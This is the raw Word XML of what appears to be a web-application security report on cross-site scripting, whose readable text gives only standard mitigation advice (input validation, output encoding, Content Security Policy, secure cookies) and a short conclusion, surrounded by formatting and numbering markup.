    <w:p w14:paraId="2D270BA8" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Best Practices to Mitigate XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657CF6A0" w14:textId="77777777" w:rsidR="00327AED" w:rsidRDefault="00327AED">
      <w:pPr>
        <w:spacing w:line="271" w:lineRule="auto"/>
        <w:sectPr w:rsidR="00327AED">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1820" w:right="1440" w:bottom="280" w:left="1520" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="060E51AA" w14:textId="614C563F" w:rsidR="00327AED" w:rsidRDefault="008F35A2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487513600" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4B3E121A" wp14:editId="274959D8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7772400" cy="100584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7772400" cy="10058400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5F8BB2" w14:textId="423BD294" w:rsidR="00327AED" w:rsidRDefault="00327AED">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="627F1A8E" w14:textId="2C4B50EC" w:rsidR="00327AED" w:rsidRDefault="00327AED">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="412AB332" w14:textId="77777777" w:rsidR="00327AED" w:rsidRDefault="00327AED">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="198"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED63102" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Input Validation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424FA375" w14:textId="425F639F" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>Validate and sanitize all user inputs to ensure only expected data is processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043E9BAB" w14:textId="0A7944FF" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="008F35A2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Encoding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E6B2A1" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>Properly encode data before rendering it in the browser to prevent script execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5FBD94" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content Security Policy (CSP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF8B09B" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>Implement a robust CSP to restrict the sources from which scripts can be loaded and executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9BFBFB" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Secure Cookies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1EA593" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>Use HttpOnly and Secure attributes for cookies to prevent access via JavaScript and ensure they are transmitted over HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C2C6A1" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Suggested Remediation Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4ADA3D" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>Implement input validation using a library like OWASP ESAPI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A34880" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>Apply output encoding using functions such as htmlspecialchars() in PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74213761" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>Configure CSP headers in the web server configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39567F1F" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>Set secure attributes for cookies in the application code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46579DE8" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1F90DC" w14:textId="723003EF" w:rsidR="00327AED" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>This report demonstrates the process of identifying, exploiting, and understanding XSS vulnerabilities in the target application. Following the recommended actions will help secure the application against such vulnerabilities and enhance overall security.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00327AED">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1820" w:right="144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061F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E82A2ED6"/>
    <w:lvl w:ilvl="0" w:tplc="33EC33E0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="820" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:spacing w:val="-1"/>
        <w:w w:val="87"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="5E960196">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1540" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Tahoma" w:eastAsia="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="522008A2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2400" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A33A6C9A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3260" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="D2F0C81A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4120" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="30CA0EC2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4980" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="9FECA564">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5840" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="6FD47556">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6700" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="01B6DC5C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0C246DAC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="665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02BF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1874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8DC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E27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B1B3F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7C2C2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E227F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="392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B4920"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4A7CE6E8"/>
    <w:lvl w:ilvl="0" w:tplc="E41803F8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="340" w:hanging="240"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Tahoma" w:eastAsia="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="-1"/>
        <w:w w:val="87"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A4C2431A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="820" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Tahoma" w:eastAsia="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="89B4203E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2C68DCE6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2700" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="09FA1148">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3640" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="389665A2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4580" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="509A9024">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5520" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="367EE5FA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6460" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="2F4E4C34">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7400" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="367E477B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F88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819FA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7C2C2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41B31"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DEDE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C7AC1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="28B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514AC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8FC6375E"/>
    <w:lvl w:ilvl="0" w:tplc="93CC9B98">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="820" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Tahoma" w:eastAsia="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="7C149BEC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1666" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="34A4F1A2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2512" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="7834FCC0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3358" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="DE0270FA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4204" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="9D4883E4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5050" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="2652871A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5896" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="55C60CD0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6742" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D58CFD6A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7588" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="509829907">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="589311357">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="147133666">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="830101696">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1453747031">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="561252485">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="679236874">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1085146541">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="970598530">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="328676966">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="20978408">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1999382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ED"/>
    <w:rsid w:val="00327AED"/>
    <w:rsid w:val="007E3ED6"/>
    <w:rsid w:val="008F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FF66"/>
  <w15:docId w15:val="{B045F7D5-75B7-4EE4-887B-1AF5659D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0"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="338" w:hanging="23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F35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php.vulnweb.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WebAppSec</dc:title>
  <dc:creator>ZAINAB</dc:creator>
  <cp:lastModifiedBy>Zainab Athar</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-01T18:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-01T18:01:00Z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